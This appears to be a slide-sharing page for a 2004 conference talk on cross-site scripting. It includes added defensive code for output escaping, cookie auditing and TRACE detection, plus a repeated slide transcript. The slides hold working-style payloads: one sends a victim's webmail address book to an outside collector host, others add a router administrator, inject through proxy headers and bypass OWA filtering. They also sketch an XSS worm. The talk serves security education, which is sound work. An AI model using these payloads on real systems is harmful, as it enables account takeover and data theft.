FIST Conference March 2004




Not only a XSS
Toni Cortès Martínez
Infohacking Research
Guideline

    Introduction
    XSS Today
    Let's see some XSS

                   Infohacking Research   2   Not O
Introduction

    What's this?
        XSS?
        How does it work?
        Where does it work?
        Application level security.
        OK, but it's only a XSS.

XSS

    XSS (common attacks)
        When somebody can exploit user inputs to get a non-expected response.
        The error is usually due to poor filtering of user inputs and/or of the output of dynamically generated pages.
        This could allow access to something restricted to the user, for example: session credentials (cookies, session IDs, etc.)

How it works

    The attacker must trick the victim into making a special HTTP request.
        Usually exploited in web environments:
         1) Webmails
         2) Web forums
         3) Any web application (dynamic content) that allows user interaction
        Other applications that render some output in HTML (log viewers, mail clients): "HTML injection" (like ILLC techniques).
        Exploits a non-secure programming methodology.
        The attacker usually wants the victim to do something:
            Send out some cookie (session or permanent)
            Make an HTTP request for you ;)
        The goal of XSS: we are in the victim's environment.

How it works, example

    We found a flaw on a server (e.g. an online bank with an email service).
    Construct a special request to exploit this flaw (XSS) and obtain user credentials.
    Send a message to the victim (with window.open, img src, etc.)
    Wait for the user to access it and get the session tracking cookie.
    Access the online bank with the user's credentials (stolen cookie).
    Now we are this user for a while.

Where it works

    Any dynamically generated content that depends on the user's input is a potential XSS security hole.
        Enter your name: Toni
        Hi Toni

    Simple example of exploitation on a dynamic page:
        Enter your name: Toni<script>alert('Hello XSS')</script>
        Hi Toni

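The greeting page from the slide above, rendered both ways in an added example that is not part of the original slides: one function pastes the name straight into the page (the hole the slide shows), the other HTML-encodes it at the point of output. The function names and the form field are my own additions.

```javascript
// Added example, not from the original slides: the "Enter your name / Hi Toni"
// page rendered unsafely and safely. Function names are the editor's own.

// Encode the characters that can break out of HTML text or attribute context.
// Quotes are encoded too, so the same function is safe inside value="...".
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: the raw input is concatenated into the page body and into the
// echoed form field, exactly the pattern the slide shows. Kept only for the
// side-by-side comparison.
function renderGreetingUnsafe(name) {
  return '<p>Hi ' + name + '</p>\n<input name="user" value="' + name + '">';
}

// Hardened: output encoding where the data meets the HTML. One encoder covers
// both the text node and the attribute value.
function renderGreetingSafe(name) {
  const n = escapeHtml(name);
  return '<p>Hi ' + n + '</p>\n<input name="user" value="' + n + '">';
}

// Crude check used in the test: did a <script> tag reach the output?
// A demo helper, not a sanitizer.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The slide's own input, as a constructed sample.
const SAMPLE_INPUT = "Toni<script>alert('Hello XSS')</script>";

console.log(renderGreetingSafe(SAMPLE_INPUT));
```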
Application level security

    Nowadays, application level security is one of the computing challenges.
        Application level firewalls like HIVE or layer 7 filters.
        Client side security is out of the webmaster's control.
        Servers can only do their best trying to filter any data coming from the client side.
        Fact: most XSS based attacks and vulnerabilities are easy to exploit.
            No special skills are needed -> script kiddies.
            XSS is useful to impersonate a user but doesn't provide a direct or easy way of controlling a computer... umm, well, you still can do lots of things ;-)

OK, but it's only a XSS...

    Yes, XSS attacks seem to be harmless by themselves, but they could open other attack vectors.
        We can gain access to a web-admin tool.
            (IIS 6.0 Web Admin XSS vulnerability)
        XSS breaks old HTTP session tracking methods: use of IDs in the URL, cookies and also source IP based authentication.
            (Iplanet Messaging Server XSS vulnerability)
        Combination of XSS with other flaws to launch a more complex attack:
            - Hotmail XSS and AV bypass
            - Microsoft user domain credentials access via OWA XSS (via XST)

XSS today

    XSS, next generation attacks.
    Proof of concept: HTTP redirection
    XSS based worms & trojans
    XSS worm
    XSS trojan
    Anyone could be affected by XSS

XSS next generation attacks

    HTTP response redirection (information leak)
        (Zeus Web Admin XSS)
    HTTP bouncing (full interactive)
    ... under construction

HTTP redirection

    Proof of concept: HTTP redirection
        Example of an evil link that steals the address book of the victim's webmail:

    http://<target>/vulnerable.cgi?variable=<script>function%20pedo(){var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","http://<target>/address_book.cgi",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;window.open("http://www.infohacking.com/data_collector.php?response="+xmlDoc);} pedo();</script>

HTTP redirection

    Which means:

    http://<target>/vulnerable.cgi?variable=      (server path to script injection)
    <script>
    function pedo()
    {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
    xmlHttp.open("GET","http://<target>/address_book.cgi",false); // MAKE REQUEST
    xmlHttp.send();
    xmlDoc=xmlHttp.responseText; // STORE RESPONSE
    window.open("http://<attacker_site>/"+xmlDoc);} // SEND RESPONSE TO ATTACKER
    pedo();
    </script>

    Note: we use "window.open" to send the response in order to bypass the "xmlHttp.open" security restrictions.

XSS based worms & trojans

    General "features"
        Spreading through webmail servers
        Self-decrypting script routine
        Can modify permanent cookies (trojan)
        Can force session logout (D.o.S.)
        Can impersonate the user
        Can steal information (mail content, address book, etc.)
        Hard to detect by AV software (encrypted payload)
        If no user action is needed (as with an XSS in some field of the mail) then the spreading will be very fast!

XSS worm

    How it works:
        Once executed, the script will self-decrypt and try to detect the source (Hotmail, Yahoo, Terra, ...) or the webmail software (Iplanet, etc). It can be done with a simple "document.URL", comparing it with some patterns.
        If the source is known, try to get the address book
        Filter only webmail addresses
        Auto-send routine

XSS trojan

    How it works:
        Once executed, the script will self-decrypt and try to set a permanent cookie (it will be stored on the victim's hard disk)
        The modified cookie could change some option: it can set Chinese language as default ;-) (D.o.S.)
        The modified cookie could redirect the victim to some place on the server that is controlled by the attacker (changing some profile setting in the cookie)

    As worms, trojans could try to spread...

Anyone can be affected by XSS

    Recent example: ViewCVS.py

    Affected sites: Sourceforge.net, Apache.org, Iptables.org.

    Those sites are well known to everybody, and they are probably managed by security-conscious people...

    ... anyway, they still can be exposed to XSS risks...

Sourceforge.net

Apache.org

Iptables.org

XSS Examples

    Some XSS examples from Infohacking Research
        3Com 812 ADSL router -> we add a new admin
        Inktomi Traffic Server -> all users vulnerable through this XSS
        Iplanet Messaging Server -> session hijack
        Microsoft ISA Server ->
        OWA XSS -> access to user credentials

XSS on 3com ADSL router

    There are a lot of XSS present on the OCR812
        http://<ip_of_OCR812>/<script>document.write("<b>WE_CAN_INJECT_CODE</b>")</script>

XSS on 3com ADSL router

    With XSS we can insert new users into our router
        We can use window.open, or <img src=..>, to make our special request
        /Forms/admin_telnet_add"+String.fromCharCode(63)+"uumUserName=infohacking&uumUserPassword=

XSS on 3com ADSL router

    We can complete the whole process if we know the IP, user and password (for example, the old admin's)

    <html>
    <img src="<ip_or_name_of_OCR812>/legalizacion_marihuana.jpg">
    <script type="text/javascript">
    var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP")
    xmlHttp.open("GET", "<YOUR_FUCKING_REQUEST>", false)
    xmlHttp.setRequestHeader("Authorization", "Basic User:Password(base64 encoded)")
    xmlHttp.send()
    </script>
    </html>

Inktomi Traffic Server XSS

    Inktomi Traffic Server is a proxy cache used in several countries by ISPs
        Also known in Spain as "Proxy cache de Telefónica"
        A special request by a client passing through the Inktomi Traffic Server causes an error page generated by the proxy. This dynamic error page is vulnerable to Cross Site Scripting...
        Indirectly, any server whose clients come through the Traffic Server and that uses cookies to track sessions is "vulnerable".
        The client making the request IS UNABLE to distinguish what domain generated this code...

Inktomi Traffic Server XSS

    Exploit?
        We tested it on version 5.5.1.
        We only need to configure a proxy on ANY IP with port 80.
        Make a special request:
        http://<spoofed_domain>:443/</em><script>alert()</script>
        We can see the script executed in our browser, "generated" by the spoofed domain. Now we can access the cookies, and everything, like a man in the middle attack.

Iplanet messaging server XSS

    This webmail, Iplanet messaging server, allows us to hijack the SID.
        This server allows "online" opening of file attachments. This means that any HTML file will be opened by the client browser in the Iplanet webmail domain context. Wonderful XSS ;-)
        Now we can exploit this XSS with an HTML attachment.
        With document.URL we obtain the SID and userid (located in the URL)
        With the SID, we gain access to all attachments.
    http://<iplanet_host>/attach/file.html?sid=XYXYXYXYXYXYXY&mbox=INBOX&uid=XXXXX&number=2&filename=file.html

Iplanet messaging server XSS

    But this is not easy... Iplanet webmail includes IP session tracking.
    When can we use the hijacked SID?
        If we are near the victim, behind a NAT device, we can access with his SID.
        We can steal the session of all people who access through a transparent proxy (like transparent proxy devices).
        Or we can create a script to force the user to make the request and redirect it to us. Of course... they don't see anything... (see above)
    Note: a lot of web servers use the same session cookie on both the http and https domains. (This note is for the online bank developers).

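A defender-side check for the note above, added here as an example that is not part of the original slides: it parses Set-Cookie headers and reports session cookies that lack the Secure attribute (so they travel over plain http as well as https, the sharing the note warns about), lack HttpOnly (so script in the page can read them, which is what the payloads in this deck collect), or carry a Domain attribute (one cookie for every host under it). The function names, the session-name heuristic and the sample headers are my own.

```javascript
// Added example, not from the original slides: a Set-Cookie attribute audit.
// Function names, the session-name heuristic and the samples are the editor's own.

// Parse one Set-Cookie header value. Attribute names are case-insensitive
// (RFC 6265), so they are stored lower-cased; flag attributes map to true.
function parseSetCookie(header) {
  const [nameValue, ...attrs] = header.split(";").map((p) => p.trim()).filter(Boolean);
  const eq = nameValue.indexOf("=");
  const cookie = {
    name: eq >= 0 ? nameValue.slice(0, eq).trim() : nameValue,
    value: eq >= 0 ? nameValue.slice(eq + 1).trim() : "",
    attributes: {},
  };
  for (const attr of attrs) {
    const i = attr.indexOf("=");
    const key = (i >= 0 ? attr.slice(0, i) : attr).trim().toLowerCase();
    cookie.attributes[key] = i >= 0 ? attr.slice(i + 1).trim() : true;
  }
  return cookie;
}

// Demo assumption: a cookie whose name looks like a session identifier.
// A real audit would take the exact names from the application's configuration.
const SESSION_NAME_PATTERN = /sess|sid|auth|token|login/i;

// Findings for one header: an array of { name, issue } objects.
function auditSetCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!SESSION_NAME_PATTERN.test(c.name)) return findings; // preference cookies are out of scope
  if (!("secure" in c.attributes)) {
    findings.push({ name: c.name, issue: "missing-secure" });   // also sent over plain http
  }
  if (!("httponly" in c.attributes)) {
    findings.push({ name: c.name, issue: "missing-httponly" }); // readable via document.cookie
  }
  if ("domain" in c.attributes) {
    findings.push({ name: c.name, issue: "domain-wide" });      // sent to every host under Domain
  }
  return findings;
}

// Audit every Set-Cookie header of one response.
function auditResponseCookies(setCookieHeaders) {
  return setCookieHeaders.flatMap(auditSetCookie);
}

// Constructed samples modelled on the deck's scenarios, not captured traffic.
const SAMPLE_HEADERS = [
  "SID=XYXYXYXYXYXYXY; Path=/; Domain=.example.test",        // Iplanet-style session id, no flags
  "sessionid=abc123; Path=/; Secure; HttpOnly",              // the corrected form
  "lang=en; Path=/; Expires=Wed, 01 Jan 2025 00:00:00 GMT",  // a preference cookie
];

console.log(auditResponseCookies(SAMPLE_HEADERS));
```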
Microsoft ISA Server XSS

    This example shows an XSS exploited using headers
        When we try to go to an unreachable URL through ISA Server, ISA generates an error page showing some data (the content of the "Via" header).
        We fix this header.
        Now we can request a non-existent URL on an existing domain. (usually servers use the same cookie on their whole domain)
        Steal cookies
        Access.
        We don't need a flaw in the server code. Use ISA Server instead.

ISA Server Exploit

<html>
<body>
<script type="text/javascript">
alert("Click OK then wait for a few seconds...")
var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP")
xmlHttp.open("GET", "http://www.infohacking.com:113", false)
xmlHttp.setRequestHeader("Via", "CODE_INJECTED_IN_VIA_HEADER<script>alert(\"ISA_SERVER_XSS_by_INFOHACKING\")</script>")
xmlHttp.send()
xmlDoc=xmlHttp.responseText

document.write(xmlHttp.responseText)
</script>
</body>
</html>

OWA XSS

    What do we have here?
        With OWA you can see an HTML formatted e-mail
        A user must click on a special link for this purpose in the webmail interface, and an alert will pop up.
        To avoid people executing malicious content in the client browser, OWA will try to filter the content of the mail.

        Good, but... not enough.

Disabling OWA filtering

    The URL to view an HTML formatted mail is something like this:
    http://<IP_or_name_of_the_server>/exchange/<username>/<inbox_name>/<subject>.EML/1_multipart/2_text.htm?Security=1

    Good name for a parameter; another name could be "change_this_for_fucking_us"

    We only need to remove this parameter, and OWA doesn't apply the filter.

OWA XSS

    Obtaining data to create our special link.
        We need the IP or hostname of the server, the user name and the subject.
        All this can be found in the "Referer" header of an HTTP request coming from a link in the body of the message.
            <img src="http://<site_of_the_attacker>">
        Now, with the referrer, we can send our attack.
            We have the IP or hostname of the server (from the referrer)
            We have the user name (from the referrer)
            We know the subject
            We create a link in the body of the message, without the "Security" parameter (a link to the same message without the Security parameter)

OWA, stolen credentials

    Nothing else?
        OWA uses cookies to track the HTTP session, but also uses "Basic Auth" for... more security? ;-)
        This "Basic Auth" (-> base64 encoded user:passwd) contains the user credentials for this domain.
        To access the "Basic Auth" header, the easiest way is via an HTTP "TRACE" request... and IIS (Internet Information Server) by default will allow that kind of request.

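A detection for the TRACE point above, added as an example that is not part of the original slides: it parses W3C extended log lines of the kind IIS writes (reading the #Fields: directive, so the column order does not matter) and reports TRACE/TRACK requests per client. The sample log is constructed; the function names are my own.

```javascript
// Added example, not from the original slides: find TRACE/TRACK requests in a
// W3C extended access log. The sample log and function names are the editor's own.

// Methods that echo the request (headers included) back to the client.
// TRACK is the IIS alias for TRACE and is easy to forget when only TRACE is blocked.
const ECHO_METHODS = new Set(["TRACE", "TRACK"]);

// Parse W3C extended log text into an array of record objects keyed by the
// field names from the most recent #Fields: directive.
function parseW3cLog(text) {
  let fields = null;
  const records = [];
  for (const raw of text.split("\n")) {
    const line = raw.trim();
    if (!line) continue;
    if (line.startsWith("#Fields:")) {
      fields = line.slice("#Fields:".length).trim().split(/\s+/);
      continue;
    }
    if (line.startsWith("#") || !fields) continue; // other directives, or no header yet
    const cols = line.split(/\s+/);
    const rec = {};
    fields.forEach((f, i) => { rec[f] = cols[i] !== undefined ? cols[i] : "-"; });
    records.push(rec);
  }
  return records;
}

// Records whose method is TRACE or TRACK. Browsers never send these on their
// own, so any hit from a client that also browses the webmail deserves a look.
function findEchoMethodRequests(text) {
  return parseW3cLog(text).filter((r) => ECHO_METHODS.has((r["cs-method"] || "").toUpperCase()));
}

// Per-client summary: how many echo-method requests and to which paths.
function summariseByClient(text) {
  const summary = {};
  for (const r of findEchoMethodRequests(text)) {
    const ip = r["c-ip"];
    if (!summary[ip]) summary[ip] = { count: 0, paths: [] };
    summary[ip].count += 1;
    if (!summary[ip].paths.includes(r["cs-uri-stem"])) summary[ip].paths.push(r["cs-uri-stem"]);
  }
  return summary;
}

// Constructed sample in IIS W3C format (not a real log; RFC 5737 test addresses).
const SAMPLE_LOG = `#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-method cs-uri-stem sc-status cs(User-Agent)
2004-03-01 10:00:01 192.0.2.10 GET /exchange/alice/Inbox/hello.EML 200 Mozilla/4.0
2004-03-01 10:00:02 192.0.2.10 TRACE / 200 Mozilla/4.0
2004-03-01 10:00:03 192.0.2.10 TRACK / 200 Mozilla/4.0
2004-03-01 10:00:04 192.0.2.22 GET /exchange/bob/Inbox/ 200 Mozilla/4.0
`;

console.log(summariseByClient(SAMPLE_LOG));
```

The check only finds attempts that are already in the log; the fix the slide implies is to stop the server from answering TRACE and TRACK at all.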
XSS

    That's all folks??

    Of course, as always, the imagination of the attacker is the only limit... much more fun is possible.

    Thanks for your attention.

Not only a XSS

© Toni Cortes Martinez & Hugo Vazquez Carames
Infohacking Research
Barcelona, 7 May 2004

Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 

Recently uploaded (20)

My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdf
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 

FIST Conference March 2004 XSS Presentation

  • 1. FIST Conference March 2004 Not only a XSS Toni Cortès Martínez Infohacking Research
  • 2. GUIDELINE
     Guideline
     Introduction
     XSS Today
     Let’s see some XSS
    Infohacking Research 2 Not O
  • 3. Introduction
     What’s this?
     XSS?
     How does it work?
     Where does it work?
     Application level security.
     OK, but it’s only an XSS.
  • 4. XSS
     XSS (common attacks)
     When somebody can exploit user inputs to get an unexpected response.
     The error is usually due to poor filtering of user inputs and/or of the output of dynamically generated pages.
     This could allow access to something restricted to the user, for example session credentials (cookies, session IDs, etc.)
  • 5. How it works
     How it works: the attacker must trick the victim into making a special HTTP request.
     Usually exploited in web environments:
        1) Webmails
        2) Web forums
        3) Any web application (dynamic content) that allows user interaction
     Other applications that render some output in HTML (log viewers, mail clients): “HTML injection” (like ILLC techniques)
     Exploits an insecure programming methodology.
     The attacker usually wants the victim to do something:
         Send out some cookie (session or permanent)
         Make an HTTP request for you ;)
     The goal of XSS: we are in the victim’s environment.
  • 6. How it works
     How it works, example
     We find a flaw on a server (e.g. an online bank with an email service)
     Construct a special request to exploit this flaw (XSS) and obtain user credentials.
     Send a message to the victim (with window.open, img src, etc.)
     Wait for the user to access it and get the session tracking cookie.
     Access the online bank with the user’s credentials (stolen cookie)
     Now we are this user for a while.
  • 7. Where it works
     Where does it work?
     Any dynamically generated content that depends on the user’s input is a potential XSS security hole.
     Enter your name: Toni
     Hi Toni
     Simple example of exploitation on a dynamic page:
     Enter your name: Toni<script>alert('Hello XSS')</script>
     Hi Toni
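The dynamic page from this slide, rendered once the vulnerable way and once with output encoding at the sink, as an added example that is not part of the original presentation (the renderer names and the inputs are constructed here):

```javascript
// Added example, not part of the original slides: the "Enter your name" page
// from slide 7 rendered two ways. renderUnsafe() concatenates raw input into
// the page, which is the bug the slide demonstrates; renderSafe() HTML-encodes
// the input at the output sink, so the same probe is displayed as text instead
// of being executed. Inputs below are constructed for this example.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Encode untrusted text for insertion into an HTML text node or a quoted
// attribute value. Only these five characters let input change the markup.
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: user input goes straight into the generated page.
function renderUnsafe(name) {
  return '<p>Hi ' + name + '</p>';
}

// Fixed pattern: the same template, encoding applied where the data meets HTML.
function renderSafe(name) {
  return '<p>Hi ' + escapeHtml(name) + '</p>';
}

// Check whether the user-controlled part of the output still contains a tag
// or an inline event handler. This is a test helper, not a sanitizer: a real
// HTML parser is needed for anything beyond telling the two renderers apart.
function containsActiveMarkup(html) {
  const body = html.replace(/^<p>Hi /, '').replace(/<\/p>$/, '');
  return /<\s*\/?\s*[a-z]/i.test(body) || /\bon\w+\s*=/i.test(body);
}

// Constructed inputs: the benign name and the probe shown on slide 7.
const BENIGN = 'Toni';
const PROBE = "Toni<script>alert('Hello XSS')</script>";

console.log('unsafe:', renderUnsafe(PROBE)); // the <script> tag survives
console.log('safe:  ', renderSafe(PROBE));   // shown as literal text
```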
  • 8. Application level security
     Nowadays, application level security is one of the challenges in computing.
     Application level firewalls like HIVE or layer 7 filters.
     Client side security is out of the webmasters’ control.
     Servers can only do their best trying to filter any data coming from the client side.
     Fact: most XSS based attacks and vulnerabilities are easy to exploit.
     No special skills are needed -> script kiddies.
     XSS is useful to impersonate a user but doesn’t provide a direct or easy way of controlling a computer… umm, well, you can still do lots of things ;-)
  • 9. OK, but it’s only a XSS.
     OK, but it’s only an XSS…
     Yes, XSS attacks seem to be harmless by themselves, but they could open other attack vectors.
     We can gain access to a web admin tool. (IIS 6.0 Web Admin XSS vulnerability)
     XSS breaks old HTTP session tracking methods: use of IDs in the URL, cookies and also source IP based authentication. (Iplanet Messaging Server XSS vulnerability)
     Combination of XSS with other flaws to launch a more complex attack:
        - HOTMAIL XSS and AV bypass
        - Microsoft User Domain Credentials access via OWA XSS (via XST)
  • 10. XSS Today
     XSS today
     XSS, next generation attacks.
     Proof of concept: HTTP redirection
     XSS based worms & trojans
     XSS worm
     XSS trojan
     Anyone could be affected by XSS
  • 11. XSS Next Generation
     XSS next generation attacks.
     HTTP response redirection (information leak) (Zeus Web Admin XSS)
     HTTP bouncing (fully interactive) … under construction
  • 12. HTTP Redirection
     Proof of concept: HTTP redirection
     Example of an evil link that steals the address book of the victim’s webmail:
       http://<target>/vulnerable.cgi?variable=<script>function%20pedo(){var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","http://<target>/address_book.cgi",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;window.open("http://www.infohacking.com/data_collector.php?response="+xmlDoc);}pedo();</script>
  • 13. HTTP Redirection
     Which means:
       http://<target>/vulnerable.cgi?variable=   (server path to the script injection)
       <script>
       function pedo() {
         var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
         xmlHttp.open("GET", "http://<target>/address_book.cgi", false); // MAKE REQUEST
         xmlHttp.send();
         xmlDoc = xmlHttp.responseText;                                  // STORE RESPONSE
         window.open("http://<attacker_site>/" + xmlDoc);                // SEND RESPONSE TO ATTACKER
       }
       pedo();
       </script>
     Note: we use “window.open” to send the response in order to bypass the “xmlHttp.open” security restrictions.
  • 14. XSS based worms & trojans
     General “features”
     Spreading through webmail servers
     Self decrypting script routine
     Can modify permanent cookies (trojan)
     Can force session logout (D.o.S.)
     Can impersonate the user
     Can steal information (mail content, address book, etc.)
     Hard to detect by AV software (encrypted payload)
     If no user action is needed (as with an XSS in some field of the mail) then the spreading will be very fast!
  • 15. XSS worm
     How it works:
     Once executed, the script will self decrypt and try to detect the source (Hotmail, Yahoo, Terra, …) or the webmail software (Iplanet, etc.). This can be done with a simple “document.URL”, comparing it against some patterns.
     If the source is known, try to get the address book
     Filter only webmail addresses
     Auto send routine
  • 16. XSS trojan
     How it works:
     Once executed, the script will self decrypt and try to set a permanent cookie (it will be stored on the victim’s hard disk)
     The modified cookie could change some option: it can set Chinese as the default language ;-) (D.o.S.)
     The modified cookie could redirect the victim to some place on the server that is controlled by the attacker (by changing some profile setting in the cookie)
     As worms do, the trojan could try to spread…
  • 17. Anyone can be affected by XSS
     Recent example: ViewCVS.py
     Affected sites: Sourceforge.net, Apache.org, Iptables.org.
     Those sites are well known to everybody, and they are probably managed by security conscious people…
     … anyway, they can still be exposed to XSS risks…
  • 21. XSS Examples
     Some XSS examples from Infohacking Research
     3Com 812 ADSL router -> we add a new admin
     Inktomi Traffic Server -> all users vulnerable through this XSS
     Iplanet Messaging Server -> session hijack
     Microsoft ISA Server ->
     OWA XSS -> access to user credentials
  • 22. XSS on 3com ADSL router
     There are a lot of XSS present on the OCR812
       http://<ip_of_OCR812>/<script>document.write("<b>WE_CAN_INJECT_CODE</b>")</script>
  • 23. XSS on 3com ADSL router
     With XSS we can insert new users into our router
     We can use window.open, or <img src=..>, to make our special request
       /Forms/admin_telnet_add"+String.fromCharCode(63)+"uumUserName=infohacking&uumUserPassword=
  • 24. XSS on 3com ADSL router
     We can carry out the complete process if we know the IP, user and password (for example, the old admin)
       <html>
       <img src="<ip_or_name_of_OCR812>/legalizacion_marihuana.jpg">
       <script type="text/javascript">
       var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP")
       xmlHttp.open("GET", "<YOUR_FUCKING_REQUEST>", false)
       xmlHttp.setRequestHeader("Authorization", "Basic <User:Password, base64 encoded>")
       xmlHttp.send()
       </script>
       </html>
  • 25. Inktomi Traffic Server XSS
     Inktomi Traffic Server is a proxy cache used in several countries by ISPs
     Also known in Spain as “Proxy cache de Telefónica”
     A special request by a client passing through the Inktomi Traffic Server causes an error page generated by the proxy. This dynamic error page is vulnerable to Cross Site Scripting...
     Indirectly, any server whose clients come through the Traffic Server and that uses cookies to track sessions is "vulnerable".
     The client making the request IS UNABLE to distinguish which domain generated this code...
  • 26. Inktomi Traffic Server XSS
     Exploit?
     We tested it on version 5.5.1.
     You only need to configure a proxy on ANY IP with port 80.
     Make a special request:
       http://<spoofed_domain>:443/</em><script>alert()</script>
     We can see the script executed in our browser, “generated” by the spoofed domain. Now we can access the cookies, and everything, like a man in the middle attack.
  • 27. Iplanet messaging server XSS
     This webmail, Iplanet Messaging Server, allows us to hijack the SID.
     This server allows "online" opening of file attachments. This means that any HTML file will be opened by the client browser in the Iplanet webmail domain context. Wonderful XSS ;-)
     Now we can exploit this XSS with an HTML attachment. With document.URL we obtain the SID and userid (located in the URL). With the SID, we gain access to all attachments.
       http://<iplanet_host>/attach/file.html?sid=XYXYXYXYXYXYXY&mbox=INBOX&uid=XXXXX&number=2&filename=file.html
  • 28. Iplanet messaging server XSS
     But this is not easy…. Iplanet webmail includes IP session tracking.
